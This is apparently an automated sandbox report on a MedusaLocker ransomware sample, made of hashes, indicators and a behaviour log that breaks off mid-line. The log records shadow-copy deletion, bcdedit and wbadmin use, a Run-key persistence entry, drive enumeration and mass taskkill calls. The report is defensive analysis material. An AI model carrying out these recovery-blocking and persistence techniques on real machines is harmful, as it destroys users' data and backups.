Analysis
-
max time kernel
149s -
max time network
135s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
14-08-2024 11:01
Static task
static1
Behavioral task
behavioral1
Sample
ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe
Resource
win10v2004-20240802-en
General
-
Target
ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe
-
Size
422KB
-
MD5
f736ee661d70a5d7aa322f017e04b1d2
-
SHA1
eee99e6b7c58ecc95c75cd52eb7ac02d812c1a54
-
SHA256
ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679
-
SHA512
23ff1b49955354a9a882ca2fd884157f75d937f00be2928acebab2a01fddcd018159cfd85df0e890cb2ecc0e40e6a02be926db29418928b320517ea6b538c8b8
-
SSDEEP
6144:MTqhlztbElkd+s0zyykmkkES0J2txMLVesCjuwptsOXNZcX9PNCFR09KKPOeFhbb:RhDdkybr/J2tx2VeFusZXQJhkeFhbb
Malware Config
Extracted
C:\How_to_back_files.html
medusalocker
Signatures
-
MedusaLocker
Ransomware with several variants first seen in September 2019.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2068 created 1196 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 21 -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1912 bcdedit.exe 1908 bcdedit.exe -
Renames multiple (186) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2760 wbadmin.exe -
pid Process 1884 wbadmin.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe\"" ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe\"" ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe -
Enumerates connected drives 3 TTPs 26 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\N: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\T: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\A: cipher.exe File opened (read-only) \??\L: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\M: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\V: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\Q: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\S: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\F: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\X: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\Z: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\F: cipher.exe File opened (read-only) \??\O: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\B: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\G: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\I: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\J: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\K: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\U: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\Y: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\A: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\H: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\P: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\R: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe File opened (read-only) \??\W: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl wbadmin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 31 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2264 vssadmin.exe -
Kills process with taskkill 14 IoCs
pid Process 1032 taskkill.exe 2620 taskkill.exe 1224 taskkill.exe 2040 taskkill.exe 620 taskkill.exe 2072 taskkill.exe 1800 taskkill.exe 2824 taskkill.exe 2924 taskkill.exe 3032 taskkill.exe 2960 taskkill.exe 2084 taskkill.exe 2248 taskkill.exe 2292 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "429795247" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Toolbar IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{AED1CA61-5A2C-11EF-8995-CA26F3F7E98A} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 901e3c8439eeda01 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000062974e5b5f804e45b98349be16bffb7800000000020000000000106600000001000020000000deb42952c2d2fe0d1a481c0df9cfe0be459096926d410831b69c4c23212862a7000000000e800000000200002000000047689bf2bcdcd0c50782fb78be0d549a63cdb7d167520a8eb538361ad685df6790000000c06c900e3b5e865850fb9dde3e3931a943e5e543e0d3ca888114f46df213f8ab4cb4e887f81aab0a9fef82025552e35758fdf0bb1bb8469c606e5e403e50337f80ba0bdf9df719485a776f0d5ee6d13bec48b898e4509a685210e950c7701981cf0a34fa9e8c5ef002ecfe1571749c70163195e36ef2cdf00c2b5fee10716badc548a7e3113c9bb78a549dae4fb2645e40000000b7aae156c490aa7f7c00042fb08fbd38422b3ddf66a94d2d50801ac82187453f2b5095fba4de3c05f824de0fecb0d1ee70d0649167ad1f3b0a21b7b287e89f79 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000062974e5b5f804e45b98349be16bffb78000000000200000000001066000000010000200000006ca3f8120368654d859806efaf983809a170fcc37fbb6c22a4ff1737ed0872ad000000000e800000000200002000000076f13718682defb4ac4792ea051c0eeadd5f068d91b86f354c756cf0aade40af200000009e21b96c1a4a9fee178333dea0fbacb1977883348952277183ba389684ae96e140000000c742dd6b00e42651785a0267a1edac15f1ddd7eb54b41626e049285afcc4ff79a3b790ce86efbf3717c23471716d593e2ca5fa563221c64df20596587e8c030d iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000_Classes\Local Settings IEXPLORE.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WINWORD.EXE IEXPLORE.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mhtml\OpenWithList\WINWORD.EXE IEXPLORE.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mhtml IEXPLORE.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mhtml\OpenWithList IEXPLORE.EXE -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe -
Suspicious use of AdjustPrivilegeToken 35 IoCs
description pid Process Token: SeDebugPrivilege 2248 taskkill.exe Token: SeDebugPrivilege 2924 taskkill.exe Token: SeDebugPrivilege 3032 taskkill.exe Token: SeDebugPrivilege 2620 taskkill.exe Token: SeDebugPrivilege 1224 taskkill.exe Token: SeDebugPrivilege 2040 taskkill.exe Token: SeDebugPrivilege 2960 taskkill.exe Token: SeDebugPrivilege 620 taskkill.exe Token: SeDebugPrivilege 2072 taskkill.exe Token: SeDebugPrivilege 2084 taskkill.exe Token: SeDebugPrivilege 1032 taskkill.exe Token: SeDebugPrivilege 2292 taskkill.exe Token: SeIncreaseQuotaPrivilege 3004 WMIC.exe Token: SeSecurityPrivilege 3004 WMIC.exe Token: SeTakeOwnershipPrivilege 3004 WMIC.exe Token: SeLoadDriverPrivilege 3004 WMIC.exe Token: SeSystemProfilePrivilege 3004 WMIC.exe Token: SeSystemtimePrivilege 3004 WMIC.exe Token: SeProfSingleProcessPrivilege 3004 WMIC.exe Token: SeIncBasePriorityPrivilege 3004 WMIC.exe Token: SeCreatePagefilePrivilege 3004 WMIC.exe Token: SeBackupPrivilege 3004 WMIC.exe Token: SeRestorePrivilege 3004 WMIC.exe Token: SeShutdownPrivilege 3004 WMIC.exe Token: SeDebugPrivilege 3004 WMIC.exe Token: SeSystemEnvironmentPrivilege 3004 WMIC.exe Token: SeRemoteShutdownPrivilege 3004 WMIC.exe Token: SeUndockPrivilege 3004 WMIC.exe Token: SeManageVolumePrivilege 3004 WMIC.exe Token: 33 3004 WMIC.exe Token: 34 3004 WMIC.exe Token: 35 3004 WMIC.exe Token: SeBackupPrivilege 2632 vssvc.exe Token: SeRestorePrivilege 2632 vssvc.exe Token: SeAuditPrivilege 2632 vssvc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1932 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1932 iexplore.exe 1932 iexplore.exe 760 IEXPLORE.EXE 760 IEXPLORE.EXE 760 IEXPLORE.EXE 760 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2068 wrote to memory of 264 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 31 PID 2068 wrote to memory of 264 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 31 PID 2068 wrote to memory of 264 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 31 PID 2068 wrote to memory of 264 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 31 PID 264 wrote to memory of 3060 264 cmd.exe 33 PID 264 wrote to memory of 3060 264 cmd.exe 33 PID 264 wrote to memory of 3060 264 cmd.exe 33 PID 264 wrote to memory of 3060 264 cmd.exe 33 PID 2068 wrote to memory of 1428 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 34 PID 2068 wrote to memory of 1428 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 34 PID 2068 wrote to memory of 1428 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 34 PID 2068 wrote to memory of 1428 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 34 PID 1428 wrote to memory of 2928 1428 cmd.exe 36 PID 1428 wrote to memory of 2928 1428 cmd.exe 36 PID 1428 wrote to memory of 2928 1428 cmd.exe 36 PID 1428 wrote to memory of 2928 1428 cmd.exe 36 PID 2928 wrote to memory of 2248 2928 cmd.exe 37 PID 2928 wrote to memory of 2248 2928 cmd.exe 37 PID 2928 wrote to memory of 2248 2928 cmd.exe 37 PID 2068 wrote to memory of 2836 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 39 PID 2068 wrote to memory of 2836 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 39 PID 2068 wrote to memory of 2836 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 39 PID 2068 wrote to memory of 2836 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 39 PID 2836 wrote to memory of 2912 2836 cmd.exe 41 PID 2836 wrote to memory of 2912 2836 cmd.exe 41 PID 2836 wrote to memory of 2912 2836 cmd.exe 41 PID 2836 wrote to memory of 2912 2836 cmd.exe 41 PID 2912 wrote to memory of 2824 2912 cmd.exe 42 PID 2912 wrote to memory of 2824 2912 cmd.exe 42 PID 2912 wrote to memory of 2824 2912 cmd.exe 42 PID 2068 wrote to memory of 2776 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 43 PID 2068 wrote to memory of 2776 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 43 PID 2068 wrote to memory of 2776 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 43 PID 2068 wrote to memory of 2776 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 43 PID 2776 wrote to memory of 2760 2776 cmd.exe 45 PID 2776 